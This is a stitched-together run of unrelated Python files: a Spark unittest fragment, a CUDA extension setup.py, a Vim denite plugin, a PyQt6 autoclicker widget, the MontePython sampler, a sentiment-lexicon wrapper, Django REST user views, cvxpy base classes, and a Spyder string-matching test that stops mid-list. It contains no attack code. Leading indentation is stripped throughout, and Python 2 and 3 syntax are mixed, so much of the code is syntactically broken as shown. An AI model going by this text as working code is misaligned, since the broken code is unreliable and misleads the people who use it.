self.assertEqual(word_lengths.treeReduce(add, 3), 93)
self.assertEqual(word_lengths.treeReduce(add, 1), word_lengths.reduce(add))
self.assertEqual(word_lengths.treeReduce(add, 2), word_lengths.reduce(add))
self.assertEqual(word_lengths.treeReduce(add, 3), word_lengths.reduce(add))
if __name__ == '__main__':
unittest.main()
|
for i in range(1, int(input())+1):
print(i, i**2, i**3)
print(i, i**2+1, i**3+1)
|
from setuptools import setup
import os
import torch
import sysconfig
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDAExtension
_DEBUG = False
_DEBUG_LEVEL = 0
# extra_compile_args = []
# extra_compile_args = sysconfig.get_config_var('CFLAGS').split()
# extra_compile_args.remove('-DNDEBUG')
# extra_compile_args.remove('-O3')
if(_DEBUG):
extra_compile_args = ['-g', '-O0', '-lineinfo', '-DDEBUG=%s' % _DEBUG_LEVEL, '-UNDEBUG']
else:
# extra_compile_args += ['-g', '-O3', '-DNDEBUG']
extra_compile_args = {'cxx': ['-g'], 'nvcc': ['-O2']}
print(extra_compile_args)
setup(
name="zbuffertri_batch",
version="1.0.0",
ext_modules=[
CUDAExtension(
"zbuffertri_batch",
["zbuffertri.cpp", "zbuffertri_implementation.cu"],
extra_compile_args=extra_compile_args
# include_dirs=include_dirs
)
],
cmdclass={"build_ext": BuildExtension},
)
# .with_options(no_python_abi_suffix=True)
|
# ============================================================================
# FILE: deol.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
from denite.source.base import Base
from denite.kind.base import Base as BaseK
import denite.util
class Source(Base):
def __init__(self, vim):
super().__init__(vim)
self.name = 'deol'
self.kind = Kind(vim)
def gather_candidates(self, context):
command = context['args'][0] if context['args'] else ''
candidates = []
for tabnr in range(1, self.vim.call('tabpagenr', '$') + 1):
deol = self.vim.call('gettabvar', tabnr, 'deol', {})
candidates.append({
'word': (
'{}: {} ({})'.format(tabnr, deol['command'], deol['cwd'])
if deol
else '{}: [new denite]'.format(tabnr)),
'action__command': command,
'action__tabnr': tabnr,
'action__is_deol': bool(deol),
})
return candidates
class Kind(BaseK):
def __init__(self, vim):
super().__init__(vim)
self.name = 'deol'
self.default_action = 'switch'
self.redraw_actions += ['delete']
self.persist_actions += ['delete']
def action_switch(self, context):
target = context['targets'][0]
self.vim.command(f"tabnext {target['action__tabnr']}")
if not target['action__is_deol']:
self.vim.command(f"Deol {target['action__command']}")
def action_new(self, context):
target = context['targets'][0]
if not target['action__is_deol']:
return
self.vim.command(f"tabnext {target['action__tabnr']}")
deol = self.vim.call('gettabvar',
target['action__tabnr'], 'deol')
options = {'start_insert': deol['options']['start_insert']}
if target['action__command']:
options['command'] = target['action__command']
self.vim.call('deol#new', options)
def action_delete(self, context):
tabnr = self.vim.call('tabpagenr')
for tabnr in reversed(sorted(
[x['action__tabnr'] for x in context['targets']
if x['action__tabnr'] != tabnr])):
self.vim.command(f'silent! {tabnr} tabclose')
def action_edit(self, context):
target = context['targets'][0]
if not target['action__is_deol']:
return
deol = self.vim.call('gettabvar',
target['action__tabnr'], 'deol')
cwd = str(self.vim.call(
'denite#util#input',
'New deol cwd: ', deol['cwd'], 'dir'
))
self.vim.command('redraw')
if cwd == '':
return
if self.vim.call('filereadable', cwd):
denite.util.error(self.vim, f'{cwd} is not directory.')
return
if not self.vim.call('isdirectory', cwd):
result = self.vim.call(
'confirm',
f"[deol] {cwd} is not directory. Create?",
"&Yes\n&No\n&Cancel")
if result != 1:
return
self.vim.call('mkdir', cwd, 'p')
self.vim.command(f"tabnext {target['action__tabnr']}")
# Move to deol buffer
self.vim.call('deol#start', '')
self.vim.call('deol#cd', cwd)
|
from lib.autoclicker.logger import get_logger
from PyQt6.QtWidgets import QHBoxLayout, QPushButton, QRadioButton, QLineEdit, QGroupBox
from PyQt6.QtGui import QIntValidator
from PyQt6.QtCore import pyqtSignal
from pynput.mouse import Button, Listener as mouseListener
Logger = get_logger(__name__)
class cursor_location(QGroupBox):
useCurrentLocation = pyqtSignal(bool)
currentLocation = pyqtSignal(int, int)
def __init__(self, parent):
super().__init__(parent)
self.setTitle("Cursor Location")
try:
# Create Cursor Location Layout
layout = QHBoxLayout()
# Set Cursor Location Layout as layout for Cursor location frame
self.setLayout(layout)
# Create Current location radio button
CurrentLocation = QRadioButton("Current Location")
CurrentLocation.setObjectName("current_location")
CurrentLocation.clicked.connect(self.ToggleSpecifcLocation)
CurrentLocation.clicked.connect(lambda: self.useCurrentLocation.emit(True))
CurrentLocation.setChecked(True)
# Create Specific location radio button
specific_location = QRadioButton("Specific Location")
specific_location.clicked.connect(self.ToggleSpecifcLocation)
specific_location.clicked.connect(
lambda: self.useCurrentLocation.emit(False)
)
# Create Select Specific Location Button
SelectLocation = QPushButton("Select Location")
SelectLocation.setObjectName("select_location")
SelectLocation.clicked.connect(self.getLocation)
SelectLocation.setEnabled(False)
validator = QIntValidator(0, 9999, self)
# Create X cordinate spot
x_cordinate = QLineEdit()
x_cordinate.setObjectName("x_cordinate")
x_cordinate.setEnabled(False)
x_cordinate.setText("0")
x_cordinate.setValidator(validator)
x_cordinate.textChanged.connect(
lambda: self.currentLocation.emit(self.get_X_Cord(), self.get_Y_Cord())
)
# Create Y cordinate spot
y_cordinate = QLineEdit()
y_cordinate.setObjectName("y_cordinate")
y_cordinate.setEnabled(False)
y_cordinate.setText("0")
y_cordinate.setValidator(validator)
y_cordinate.textChanged.connect(
lambda: self.currentLocation.emit(self.get_X_Cord(), self.get_Y_Cord())
)
# Load all widgets
layout.addWidget(CurrentLocation)
layout.addWidget(specific_location)
layout.addWidget(x_cordinate)
layout.addWidget(y_cordinate)
layout.addWidget(SelectLocation)
except Exception as e:
Logger.error(e)
Logger.error("failed to initialize cursor location section")
else:
Logger.info("successfully initialized cursor location section")
def ToggleSpecifcLocation(self):
x_cordinate = self.findChild(QLineEdit, "x_cordinate")
x_cordinate.setEnabled(not x_cordinate.isEnabled())
y_cordinate = self.findChild(QLineEdit, "y_cordinate")
y_cordinate.setEnabled(not y_cordinate.isEnabled())
select_location = self.findChild(QPushButton, "select_location")
select_location.setEnabled(not select_location.isEnabled())
def get_X_Cord(self) -> int:
return int(self.findChild(QLineEdit, "x_cordinate").text())
def get_Y_Cord(self) -> int:
return int(self.findChild(QLineEdit, "y_cordinate").text())
def getLocation(self) -> None:
try:
def on_click(x, y, button: Button, pressed: bool):
if pressed and button == Button.left:
self.update_cordinates(str(x), str(y))
self.listener.stop()
def on_move(x, y):
self.update_cordinates(str(x), str(y))
self.listener = mouseListener(on_move=on_move, on_click=on_click)
self.listener.start()
except Exception as e:
Logger.error(e)
def update_cordinates(self, X: str, Y: str) -> None:
try:
self.findChild(QLineEdit, "x_cordinate").setText(X)
self.findChild(QLineEdit, "y_cordinate").setText(Y)
except Exception as e:
Logger.error(e)
|
"""
.. module:: sampler
:synopsis: Generic sampler
.. moduleauthor:: Benjamin Audren <benjamin.audren@epfl.ch>
.. moduleauthor:: Surhudm More <>
This module defines one key function, :func:`run`, that distributes the work to
the desired actual sampler (Metropolis Hastings, or Nested Sampling so far).
It also defines a serie of helper functions, that aim to be generically used by
all different sampler methods:
* :func:`get_covariance_matrix`
* :func:`read_args_from_chain`
* :func:`read_args_from_bestfit`
* :func:`accept_step`
* :func:`compute_lkl`
"""
import numpy as np
import sys
import warnings
import io_mp
import os
def run(cosmo, data, command_line):
"""
Depending on the choice of sampler, dispatch the appropriate information
The :mod:`mcmc` module is used as previously, except the call to
:func:`mcmc.chain`, or :func:`nested_sampling.run` is now within
this function, instead of from within :mod:`MontePython`.
In the long term, this function should contain any potential hybrid scheme.
"""
if command_line.method == 'MH':
import mcmc
mcmc.chain(cosmo, data, command_line)
data.out.close()
elif command_line.method == 'NS':
import nested_sampling as ns
ns.run(cosmo, data, command_line)
elif command_line.method == 'CH':
import cosmo_hammer as hammer
hammer.run(cosmo, data, command_line)
elif command_line.method == 'IS':
import importance_sampling as ims
ims.run(cosmo, data, command_line)
elif command_line.method == 'Der':
import add_derived as der
der.run(cosmo, data, command_line)
else:
raise io_mp.ConfigurationError(
"Sampling method %s not understood" % command_line.method)
def read_args_from_chain(data, chain):
"""
Pick up the last accepted values from an input chain as a starting point
Function used only when the restart flag is set. It will simply read the
last line of an input chain, using the tail command from the extended
:class:`io_mp.File` class.
.. warning::
That method was not tested since the adding of derived parameters. The
method :func:`read_args_from_bestfit` is the prefered one.
.. warning::
This method works because of the particular presentation of the chain,
and the use of tabbings (not spaces). Please keep this in mind if you
are having difficulties
Parameters
----------
chain : str
Name of the input chain provided with the command line.
"""
chain_file = io_mp.File(chain, 'r')
parameter_names = data.get_mcmc_parameters(['varying'])
i = 1
for elem in parameter_names:
data.mcmc_parameters[elem]['last_accepted'] = float(
chain_file.tail(1)[0].split('\t')[i])
i += 1
def read_args_from_bestfit(data, bestfit):
"""
Deduce the starting point either from the input file, or from a best fit
file.
Parameters
----------
bestfit : str
Name of the bestfit file from the command line.
"""
parameter_names = data.get_mcmc_parameters(['varying'])
bestfit_file = open(bestfit, 'r')
for line in bestfit_file:
if line.find('#') != -1:
bestfit_names = line.strip('#').replace(' ', '').\
replace('\n', '').split(',')
bestfit_values = np.zeros(len(bestfit_names), 'float64')
else:
line = line.split()
for i in range(len(line)):
bestfit_values[i] = line[i]
print
print('\nStarting point for rescaled parameters:')
for elem in parameter_names:
if elem in bestfit_names:
data.mcmc_parameters[elem]['last_accepted'] = \
bestfit_values[bestfit_names.index(elem)] / \
data.mcmc_parameters[elem]['scale']
print 'from best-fit file : ', elem, ' = ',
print bestfit_values[bestfit_names.index(elem)] / \
data.mcmc_parameters[elem]['scale']
else:
data.mcmc_parameters[elem]['last_accepted'] = \
data.mcmc_parameters[elem]['initial'][0]
print 'from input file : ', elem, ' = ',
print data.mcmc_parameters[elem]['initial'][0]
def get_covariance_matrix(cosmo, data, command_line):
"""
Compute the covariance matrix, from an input file or from an existing
matrix.
Reordering of the names and scaling take place here, in a serie of
potentially hard to read methods. For the sake of clarity, and to avoid
confusions, the code will, by default, print out a succession of 4
covariance matrices at the beginning of the run, if starting from an
existing one. This way, you can control that the paramters are set
properly.
.. note::
The set of parameters from the run need not to be the exact same
set of parameters from the existing covariance matrix (not even the
ordering). Missing parameter from the existing covariance matrix will
use the sigma given as an input.
"""
# Setting numpy options in terms of precision (useful when writing to files
# or displaying a result, but does not affect the precision of the
# computation).
np.set_printoptions(precision=2, linewidth=150)
parameter_names = data.get_mcmc_parameters(['varying'])
# Define quiet setting if not previously defined
try:
command_line.quiet
except:
command_line.quiet = False
if command_line.fisher and not command_line.cov:
# We will work out the fisher matrix for all the parameters and
# write it to a file
if not command_line.silent:
warnings.warn("Fisher implementation is being tested")
# Let us create a separate copy of data
from copy import deepcopy
# Do not modify data, instead copy
temp_data = deepcopy(data)
done = False
# Create the center dictionary, which will hold the center point
# information (or best-fit) TODO
# This dictionary will be updated in case it was too far from the
# best-fit, and found a non positive-definite symmetric fisher matrix.
center = {}
if not command_line.bf:
for elem in parameter_names:
temp_data.mcmc_parameters[elem]['current'] = (
data.mcmc_parameters[elem]['initial'][0])
center[elem] = data.mcmc_parameters[elem]['initial'][0]
else:
read_args_from_bestfit(temp_data, command_line.bf)
for elem in parameter_names:
temp_data.mcmc_parameters[elem]['current'] = (
temp_data.mcmc_parameters[elem]['last_accepted'])
center[elem] = temp_data.mcmc_parameters[elem]['last_accepted']
# Have a security index that prevents looping indefinitely
security = 0
while not done and security < 10:
security += 1
# Compute the Fisher matrix and the gradient array at the center
# point.
fisher_matrix, gradient = compute_fisher(
temp_data, cosmo, center, 0.01)
# Compute inverse of the fisher matrix, catch LinAlgError exception
fisher_invert_success = True
try:
if not command_line.silent:
print("Fisher matrix computed:")
print(fisher_matrix)
cov_matrix = np.linalg.inv(fisher_matrix)
except np.linalg.LinAlgError:
raise io_mp.ConfigurationError(
"Could not find Fisher matrix, please remove the "
"option --fisher and run with Metropolis-Hastings "
"or another sampling method.")
fisher_invert_success = False
done = True
# Write it to the file
if fisher_invert_success:
io_mp.write_covariance_matrix(
cov_matrix, parameter_names,
os.path.join(command_line.folder, 'covariance_fisher.mat'))
command_line.cov = os.path.join(
command_line.folder, 'covariance_fisher.mat')
done = True
# Check if the diagonal elements are non-negative
for h, elem in enumerate(parameter_names):
if cov_matrix[h][h] < 0:
warnings.warn(
"Covariance has negative values on diagonal, "
"moving to a better point and repeating "
"the Fisher computation")
done = False
break
if not done:
# Solve for a step
step = np.dot(cov_matrix, gradient)
# Now modify data_parameters TODO HERE update center
for k, elem in enumerate(parameter_names):
data.mcmc_parameters[elem]['initial'][0] = data.mcmc_parameters[elem]['initial'][0]-step[k]
temp_data.mcmc_parameters[elem]['initial'][0] = temp_data.mcmc_parameters[elem]['initial'][0]-step[k]
print "Moved %s to:"%(elem),data.mcmc_parameters[elem]['initial'][0]
# if the user provides a .covmat file or if user asks to compute a fisher matrix
if command_line.cov is not None:
cov = open('{0}'.format(command_line.cov), 'r')
i = 0
for line in cov:
if line.find('#') != -1:
# Extract the names from the first line
covnames = line.strip('#').replace(' ', '').\
replace('\n', '').split(',')
# Initialize the matrices
matrix = np.zeros((len(covnames), len(covnames)), 'float64')
rot = np.zeros((len(covnames), len(covnames)))
else:
line = line.split()
for j in range(len(line)):
matrix[i][j] = np.array(line[j], 'float64')
i += 1
# First print out
if not command_line.silent and not command_line.quiet:
print('\nInput covariance matrix:')
print(covnames)
print(matrix)
# Deal with the all problematic cases.
# First, adjust the scales between stored parameters and the ones used
# in mcmc
scales = []
for elem in covnames:
if elem in parameter_names:
scales.append(data.mcmc_parameters[elem]['scale'])
else:
scales.append(1)
scales = np.diag(scales)
# Compute the inverse matrix, and assert that the computation was
# precise enough, by comparing the product to the identity matrix.
invscales = np.linalg.inv(scales)
np.testing.assert_array_almost_equal(
np.dot(scales, invscales), np.eye(np.shape(scales)[0]),
decimal=5)
# Apply the newly computed scales to the input matrix
matrix = np.dot(invscales.T, np.dot(matrix, invscales))
# Second print out, after having applied the scale factors
if not command_line.silent and not command_line.quiet:
print('\nFirst treatment (scaling)')
print(covnames)
print(matrix)
# Rotate matrix for the parameters to be well ordered, even if some
# names are missing or some are in extra.
# First, store the parameter names in temp_names that also appear in
# the covariance matrix, in the right ordering for the code (might be
# different from the input matri)
temp_names = [elem for elem in parameter_names if elem in covnames]
# If parameter_names contains less things than covnames, we will do a
# small trick. Create a second temporary array, temp_names_2, that will
# have the same dimension as covnames, and containing:
# - the elements of temp_names, in the order of parameter_names (h
# index)
# - an empty string '' for the remaining unused parameters
temp_names_2 = []
h = 0
not_in = [elem for elem in covnames if elem not in temp_names]
for k in range(len(covnames)):
if covnames[k] not in not_in:
temp_names_2.append(temp_names[h])
h += 1
else:
temp_names_2.append('')
# Create the rotation matrix, that will put the covariance matrix in
# the right order, and also assign zeros to the unused parameters from
# the input. These empty columns will be removed in the next step.
for k in range(len(covnames)):
for h in range(len(covnames)):
try:
if covnames[k] == temp_names_2[h]:
rot[h][k] = 1.
else:
rot[h][k] = 0.
except IndexError:
# The IndexError exception means that we are dealing with
# an unused parameter. By enforcing the corresponding
# rotation matrix element to 0, the resulting matrix will
# still have the same size as the original, but with zeros
# on the unused lines.
rot[h][k] = 0.
matrix = np.dot(rot, np.dot(matrix, np.transpose(rot)))
# Third print out
if not command_line.silent and not command_line.quiet:
print('\nSecond treatment (partial reordering and cleaning)')
print(temp_names_2)
print(matrix)
# Final step, creating a temporary matrix, filled with 1, that will
# eventually contain the result.
matrix_temp = np.ones((len(parameter_names),
len(parameter_names)), 'float64')
indices_final = np.zeros(len(parameter_names))
indices_initial = np.zeros(len(covnames))
# Remove names that are in parameter names but not in covnames, and
# set to zero the corresponding columns of the final result.
for k in range(len(parameter_names)):
if parameter_names[k] in covnames:
indices_final[k] = 1
for zeros in np.where(indices_final == 0)[0]:
matrix_temp[zeros, :] = 0
matrix_temp[:, zeros] = 0
# Remove names that are in covnames but not in param_names
for h in range(len(covnames)):
if covnames[h] in parameter_names:
indices_initial[h] = 1
# There, put a place holder number (we are using a pure imaginary
# number: i, to avoid any problem) in the initial matrix, so that the
# next step only copy the interesting part of the input to the final
# matrix.
max_value = np.finfo(np.float64).max
for zeros in np.where(indices_initial == 0)[0]:
matrix[zeros, :] = [max_value for _ in range(
len(matrix[zeros, :]))]
matrix[:, zeros] = [max_value for _ in range(
len(matrix[:, zeros]))]
# Now put in the temporary matrix, where the 1 were, the interesting
# quantities from the input (the one that are not equal to i).
matrix_temp[matrix_temp == 1] = matrix[matrix != max_value]
matrix = np.copy(matrix_temp)
# on all other lines, that contain 0, just use sigma^2
for zeros in np.where(indices_final == 0)[0]:
matrix[zeros, zeros] = np.array(
data.mcmc_parameters[parameter_names[zeros]]['initial'][3],
'float64')**2
# else, take sigmas^2.
else:
matrix = np.identity(len(parameter_names), 'float64')
for index, elem in enumerate(parameter_names):
matrix[index][index] = np.array(
data.mcmc_parameters[elem]['initial'][3], 'float64')**2
# Final print out, the actually used covariance matrix
if not command_line.silent and not command_line.quiet:
sys.stdout.write('\nDeduced starting covariance matrix:\n')
print(parameter_names)
print(matrix)
#inverse, and diagonalization
eigv, eigV = np.linalg.eig(np.linalg.inv(matrix))
return eigv, eigV, matrix
def accept_step(data):
"""
Transfer the 'current' point in the varying parameters to the last accepted
one.
"""
for elem in data.get_mcmc_parameters(['varying']):
data.mcmc_parameters[elem]['last_accepted'] = \
data.mcmc_parameters[elem]['current']
for elem in data.get_mcmc_parameters(['derived']):
data.mcmc_parameters[elem]['last_accepted'] = \
data.mcmc_parameters[elem]['current']
def check_flat_bound_priors(parameters, names):
"""
Ensure that all varying parameters are bound and flat
It is a necessary condition to use the code with Nested Sampling or the
Cosmo Hammer.
"""
is_flat = all(parameters[name]['prior'].prior_type == 'flat'
for name in names)
is_bound = all(parameters[name]['prior'].is_bound()
for name in names)
return is_flat, is_bound
def compute_lkl(cosmo, data):
"""
Compute the likelihood, given the current point in parameter space.
This function now performs a test before calling the cosmological model
(**new in version 1.2**). If any cosmological parameter changed, the flag
:code:`data.need_cosmo_update` will be set to :code:`True`, from the
routine :func:`check_for_slow_step <data.Data.check_for_slow_step>`.
Returns
-------
loglike : float
The log of the likelihood (:math:`\\frac{-\chi^2}2`) computed from the
sum of the likelihoods of the experiments specified in the input
parameter file.
This function returns :attr:`data.boundary_loglkie
<data.data.boundary_loglike>`, defined in the module :mod:`data` if
*i)* the current point in the parameter space has hit a prior edge, or
*ii)* the cosmological module failed to compute the model. This value
is chosen to be extremly small (large negative value), so that the step
will always be rejected.
"""
from classy import CosmoSevereError, CosmoComputationError
# If the cosmological module has already been called once, and if the
# cosmological parameters have changed, then clean up, and compute.
if cosmo.state and data.need_cosmo_update is True:
cosmo.struct_cleanup()
# If the data needs to change, then do a normal call to the cosmological
# compute function. Note that, even if need_cosmo update is True, this
# function must be called if the jumping factor is set to zero. Indeed,
# this means the code is called for only one point, to set the fiducial
# model.
if ((data.need_cosmo_update) or
(not cosmo.state) or
(data.jumping_factor == 0)):
# Prepare the cosmological module with the new set of parameters
cosmo.set(data.cosmo_arguments)
# Compute the model, keeping track of the errors
# In classy.pyx, we made use of two type of python errors, to handle
# two different situations.
# - CosmoSevereError is returned if a parameter was not properly set
# during the initialisation (for instance, you entered Ommega_cdm
# instead of Omega_cdm). Then, the code exits, to prevent running with
# imaginary parameters. This behaviour is also used in case you want to
# kill the process.
# - CosmoComputationError is returned if Class fails to compute the
# output given the parameter values. This will be considered as a valid
# point, but with minimum likelihood, so will be rejected, resulting in
# the choice of a new point.
try:
cosmo.compute(["lensing"])
except CosmoComputationError as failure_message:
sys.stderr.write(str(failure_message)+'\n')
sys.stderr.flush()
return data.boundary_loglike
except CosmoSevereError as critical_message:
raise io_mp.CosmologicalModuleError(
"Something went wrong when calling CLASS" +
str(critical_message))
except KeyboardInterrupt:
raise io_mp.CosmologicalModuleError(
"You interrupted execution")
# For each desired likelihood, compute its value against the theoretical
# model
loglike = 0
# This flag holds the information whether a fiducial model was written. In
# this case, the log likelihood returned will be '1j', meaning the
# imaginary number i.
flag_wrote_fiducial = 0
for likelihood in data.lkl.itervalues():
if likelihood.need_update is True:
value = likelihood.loglkl(cosmo, data)
# Storing the result
likelihood.backup_value = value
# Otherwise, take the existing value
else:
value = likelihood.backup_value
loglike += value
# In case the fiducial file was written, store this information
if value == 1j:
flag_wrote_fiducial += 1
# Compute the derived parameters if relevant
if data.get_mcmc_parameters(['derived']) != []:
try:
derived = cosmo.get_current_derived_parameters(
data.get_mcmc_parameters(['derived']))
for name, value in derived.iteritems():
data.mcmc_parameters[name]['current'] = value
except AttributeError:
# This happens if the classy wrapper is still using the old
# convention, expecting data as the input parameter
cosmo.get_current_derived_parameters(data)
except CosmoSevereError:
raise io_mp.CosmologicalModuleError(
"Could not write the current derived parameters")
for elem in data.get_mcmc_parameters(['derived']):
data.mcmc_parameters[elem]['current'] /= \
data.mcmc_parameters[elem]['scale']
# If fiducial files were created, inform the user, and exit
if flag_wrote_fiducial > 0:
if flag_wrote_fiducial == len(data.lkl):
raise io_mp.FiducialModelWritten(
"Fiducial file(s) was(were) created, please start a new chain")
else:
raise io_mp.FiducialModelWritten(
"Some previously non-existing fiducial files were created, " +
"but potentially not all of them. Please check now manually" +
" on the headers, of the corresponding that all parameters " +
"are coherent for your tested models")
return loglike
def compute_fisher(data, cosmo, center, step_size):
parameter_names = data.get_mcmc_parameters(['varying'])
fisher_matrix = np.zeros(
(len(parameter_names), len(parameter_names)), 'float64')
# Initialise the gradient field
gradient = np.zeros(len(parameter_names), 'float64')
for k, elem_k in enumerate(parameter_names):
kdiff = center[elem_k]*step_size
if kdiff == 0.0:
kdiff = step_size
for h, elem_h in enumerate(parameter_names):
hdiff = center[elem_h]*step_size
if hdiff == 0.0:
hdiff = step_size
# Since the matrix is symmetric, we only compute the
# elements of one half of it plus the diagonal.
if k > h:
continue
if k != h:
fisher_matrix[k][h] = compute_fisher_element(
data, cosmo, center,
(elem_k, kdiff),
(elem_h, hdiff))
fisher_matrix[h][k] = fisher_matrix[k][h]
else:
fisher_matrix[k][k], gradient[k] = compute_fisher_element(
data, cosmo, center,
(elem_k, kdiff))
return fisher_matrix, gradient
def compute_fisher_element(data, cosmo, center, one, two=None):
# Unwrap
name_1, diff_1 = one
if two:
name_2, diff_2 = two
data.mcmc_parameters[name_1]['current'] = (
center[name_1]+diff_1)
data.mcmc_parameters[name_2]['current'] = (
center[name_2]+diff_2)
data.update_cosmo_arguments()
loglike_1 = compute_lkl(cosmo, data)
data.mcmc_parameters[name_2]['current'] -= 2*diff_2
data.update_cosmo_arguments()
loglike_2 = compute_lkl(cosmo, data)
data.mcmc_parameters[name_1]['current'] -= 2*diff_1
data.mcmc_parameters[name_2]['current'] += 2*diff_2
data.update_cosmo_arguments()
loglike_3 = compute_lkl(cosmo, data)
data.mcmc_parameters[name_2]['current'] -= 2*diff_2
data.update_cosmo_arguments()
loglike_4 = compute_lkl(cosmo, data)
fisher_off_diagonal = -(
loglike_1-loglike_2-loglike_3+loglike_4)/(4.*diff_1*diff_2)
return fisher_off_diagonal
# It is otherwise a diagonal component
else:
data.mcmc_parameters[name_1]['current'] = center[name_1]
data.update_cosmo_arguments()
loglike_1 = compute_lkl(cosmo, data)
data.mcmc_parameters[name_1]['current'] += diff_1
data.update_cosmo_arguments()
loglike_2 = compute_lkl(cosmo, data)
data.mcmc_parameters[name_1]['current'] -= 2*diff_1
data.update_cosmo_arguments()
loglike_3 = compute_lkl(cosmo, data)
fisher_diagonal = -(
loglike_2-2.*loglike_1+loglike_3)/(diff_1**2)
gradient = -(loglike_2-loglike_3)/(2.*diff_1)
return fisher_diagonal, gradient
|
import pkg_resources, json
from word2lex.utils.custom_vader import SentimentIntensityAnalyzer
ROOT_PATH = pkg_resources.resource_filename('word2lex', 'data/')
AVAILABLE_MODELS = ['britain',
'usa',
'canada',
'politics_en',
'news_media',
'twitter']
GLOBAL_DICT = {}
for c in AVAILABLE_MODELS:
with open(ROOT_PATH + c + '.json', 'r') as fp:
GLOBAL_DICT[c] = json.load(fp)
class Word2Lex(object):
def __init__(self, model='politics_en'):
if type(model)==str:
if model in AVAILABLE_MODELS:
self.dictionary = GLOBAL_DICT[model]
else:
raise ValueError("Available dictionaries are 'canada', 'usa', 'britain', 'politics_en', 'news_media' and 'twitter'.")
else:
self.dictionary = GLOBAL_DICT['politics_en']
self.analyzer = SentimentIntensityAnalyzer(self.dictionary)
def sentiment(self, text):
return self.analyzer.polarity_scores(text)['compound']
|
"""Users views."""
# Django REST Framework
from rest_framework import mixins, status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
# Permissions
from rest_framework.permissions import (
AllowAny,
IsAuthenticated
)
from pmanagement.users.permissions import IsAccountOwner
# Serializer
from pmanagement.users.serializers.profiles import ProfileModelSerializer
from pmanagement.projects.serializers import ProjectModelSerializer
from pmanagement.users.serializers import (
UserLoginSerializer,
UserModelSerializer,
UserSignUpSerializer
)
# Models
from pmanagement.users.models import User
from pmanagement.projects.models import Project
class UserViewSet(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
viewsets.GenericViewSet):
"""User view set.
Handle sign up, login and account verification
"""
queryset = User.objects.all()
serializer_class = UserModelSerializer
lookup_field = 'username'
def get_permissions(self):
"""Assign permisson based on actions."""
if self.action in ['signup', 'login']:
permission = [AllowAny]
elif self.action in ['retrieve', 'update', 'partial_update']:
permission = [IsAuthenticated, IsAccountOwner]
else:
permission = [IsAuthenticated]
return [p() for p in permission]
@action(detail=False, methods=['post'])
def login(self, request):
"""User login. """
serializer = UserLoginSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user, token = serializer.save()
data = {
'user': UserModelSerializer(user).data,
'acces_token': token,
}
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=False, methods=['post'])
def signup(self, request):
"""User signup ."""
serializer = UserSignUpSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
data = UserModelSerializer(user).data
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=True, methods=['put', 'patch'])
def profile(self, request, *args, **kwargs):
"""Update profile data."""
user = self.get_object()
profile = user.profile
partial = request.method == 'PATCH'
serializer = ProfileModelSerializer(
profile,
data=request.data,
partial=partial
)
serializer.is_valid(raise_exception=True)
serializer.save()
data = UserModelSerializer(user).data
return Response(data)
def retrieve(self, request, *args, **kwargs):
"""Add extra date to the response. """
response = super(UserViewSet, self).retrieve(request, *args, **kwargs)
projects = Project.objects.filter(
members=request.user,
)
data = {
'user': response.data,
'project': ProjectModelSerializer(projects, many=True).data
}
response.data = data
return response
|
from abc import ABC, abstractmethod
from typing import List, Union
import cvxpy as cp
class CvxpyProblem(ABC):
@abstractmethod
def problem(self) -> cp.Problem:
pass
@abstractmethod
def parameters(self) -> List[cp.Parameter]:
pass
@abstractmethod
def variables(self) -> List[cp.Variable]:
pass
@abstractmethod
def solve(self, *args) -> dict:
pass
def parameter_size(self) -> int:
return sum([v.size for v in self.parameters()])
def variable_size(self) -> int:
return sum([v.size for v in self.variables()])
class MPCProblem(CvxpyProblem):
@abstractmethod
def reduced_objective(self) -> Union[cp.Minimize, cp.Maximize]:
pass
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
#
"""
Tests for stringmatching.py
"""
# Standard library imports
import os
# Test library imports
import pytest
# Local imports
from spyder.utils.stringmatching import get_search_scores
TEST_FILE = os.path.join(os.path.dirname(__file__), 'data/example.py')
def test_stringmatching_full():
"""Test stringmatching full results."""
template = '<b>{0}</b>'
names = ['close pane', 'debug continue', 'debug exit', 'debug step into',
'debug step over', 'debug step return', 'fullscreen mode',
'layout preferences', 'lock unlock panes', 'maximize pane',
'preferences', 'quit', 'restart', 'save current layout',
'switch to breakpoints', 'switch to console', 'switch to editor',
'switch to explorer', 'switch to find_in_files',
'switch to historylog', 'switch to help',
'switch to ipython_console', 'switch to onlinehelp',
'switch to outline_explorer', 'switch to project_explorer',
'switch to variable_explorer',
'use next layout', 'use previous layout', 'clear line',
'clear shell', 'inspect current object', 'blockcomment',
'breakpoint', 'close all', 'code completion',
'conditional breakpoint', 'configure', 'copy', 'copy line', 'cut',
'debug', 'debug with winpdb', 'delete', 'delete line',
'duplicate line', 'end of document', 'end of line',
'file list management', 'find next', 'find previous', 'find text',
'go to definition', 'go to line', 'go to next file',
'go to previous file', 'inspect current object', 'kill next word',
'kill previous word', 'kill to line end', 'kill to line start',
'last edit location', 'move line down', 'move line up',
'new file', 'next char', 'next cursor position', 'next line',
'next word', 'open file', 'paste', 'previous char',
'previous cursor position', 'previous line', 'previous word',
'print', 're-run last script', 'redo', 'replace text',
'rotate kill ring', 'run', 'run selection', 'save all', 'save as',
'save file', 'select all', 'show/hide outline',
'show/hide project explorer', 'start of document',
'start of line', 'toggle comment', 'unblockcomment', 'undo',
'yank', 'run profiler', 'run analysis']
full_results = get_search_scores('lay', names, template=template, )
assert full_results == [('close pane', 'close pane', -1),
('debug continue', 'debug continue', -1),
('debug exit', 'debug exit', -1),
('debug step into', 'debug step into', -1),
('debug step over', 'debug step over', -1),
('debug step return', 'debug step return', -1),
('fullscreen mode', 'fullscreen mode', -1),
('layout preferences', '<b>lay</b>out preferences',
400100),
('lock unlock panes', 'lock unlock panes', -1),
('maximize pane', 'maximize pane', -1),
('preferences', 'preferences', -1),
('quit', 'quit', -1),
('restart', 'restart', -1),
('save current layout',
'save current <b>lay</b>out', 400113),
('switch to breakpoints',
'switch to breakpoints', -1),
('switch to console', 'switch to console', -1),
('switch to editor', 'switch to editor', -1),
('switch to explorer', 'switch to explorer', -1),
('switch to find_in_files',
'switch to find_in_files', -1),
('switch to historylog',
